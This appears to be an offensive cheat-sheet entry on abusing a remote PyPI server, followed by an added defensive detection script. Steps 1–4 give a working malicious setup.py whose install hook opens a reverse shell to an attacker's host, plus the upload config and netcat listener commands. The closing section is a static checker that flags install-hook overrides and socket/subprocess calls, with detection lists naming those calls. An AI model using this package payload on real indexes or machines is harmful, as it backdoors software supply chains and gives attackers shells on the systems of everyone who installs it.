Abuse #1: Remote PyPI Server
1. Create files
mkdir evil_package
mkdir evil_package/evil_package
cd evil_package
touch README.md
touch evil_package/__init__.py
touch setup.cfg
touch setup.py
2. Replace setup.py
#!/usr/bin/env python3
from setuptools.command.install import install
from setuptools import setup
import os
import socket
import subprocess

class Exploit(install):
    def run(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("<LOCAL_IP>",<LOCAL_PORT>)) # CHANGE HERE
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        p = subprocess.call(["/bin/sh", "-i"])

setup(name="evil_package",
      version="1.0.0",
      description="Evil Package",
      author="user",
      author_email="user@<DOMAIN>",
      url="http://<DOMAIN>",
      license="MIT",
      zip_safe=False,
      cmdclass={"install": Exploit})
3. Create ~/.pypirc
[distutils]
index-servers =
    <EXAMPLE>

[<EXAMPLE>]
repository: http://<TARGET_DOMAIN>
username: <USER>
password: <PASSWORD>
4. Exploit
# Open a nc listener
rlwrap nc -lvnp <LOCAL_PORT>
# Create an archive
python3 setup.py sdist
# Upload
python3 setup.py sdist upload -r <EXAMPLE>
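Detection (added example, not part of the original page): a static check that an index operator or CI job can run on an uploaded sdist's setup.py before anything installs it. It flags the cmdclass install-hook override and the socket/subprocess usage that step 2 relies on. The names audit_setup_py, HOOKED_COMMANDS, RISKY_MODULES and RISKY_CALLS are assumptions chosen for this example.

```python
import ast
# Commands run at build/install time; overriding one executes code on the installing host.
HOOKED_COMMANDS = {"install", "develop", "build", "build_py", "build_ext", "egg_info"}
# Modules and calls with no usual role in declaring package metadata (assumed lists).
RISKY_MODULES = {"socket", "subprocess", "ctypes", "urllib", "http", "base64"}
RISKY_CALLS = {"os.system", "os.dup2", "os.popen", "subprocess.call", "subprocess.run",
               "subprocess.Popen", "socket.socket", "eval", "exec"}

def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else ''."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    return ".".join(reversed(parts + [node.id]))

def audit_setup_py(source):
    """Statically inspect setup.py text (it is parsed, never executed); return sorted findings."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            findings.update(f"import:{n.split('.')[0]}" for n in names if n.split(".")[0] in RISKY_MODULES)
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in RISKY_CALLS:
                findings.add(f"call:{name}")
            if name.split(".")[-1] == "setup":
                for kw in (k for k in node.keywords if k.arg == "cmdclass"):
                    # A non-literal cmdclass cannot be resolved statically: report it as dynamic.
                    keys = kw.value.keys if isinstance(kw.value, ast.Dict) else [None]
                    for key in keys:
                        cmd = key.value if isinstance(key, ast.Constant) else "<dynamic>"
                        if cmd == "<dynamic>" or cmd in HOOKED_COMMANDS:
                            findings.add(f"cmdclass:{cmd}")
    return sorted(findings)

# Constructed sample: same structure as the setup.py in step 2, with a harmless body.
SAMPLE = '''from setuptools.command.install import install
from setuptools import setup
import socket, subprocess
class Hook(install):
    def run(self):
        subprocess.call(["true"])
setup(name="demo", version="1.0.0", cmdclass={"install": Hook})
'''
if __name__ == "__main__":
    print(audit_setup_py(SAMPLE))
```

Findings are triage signals for review or quarantine of the upload, since legitimate packages occasionally override build commands and aliased imports are not resolved by this check.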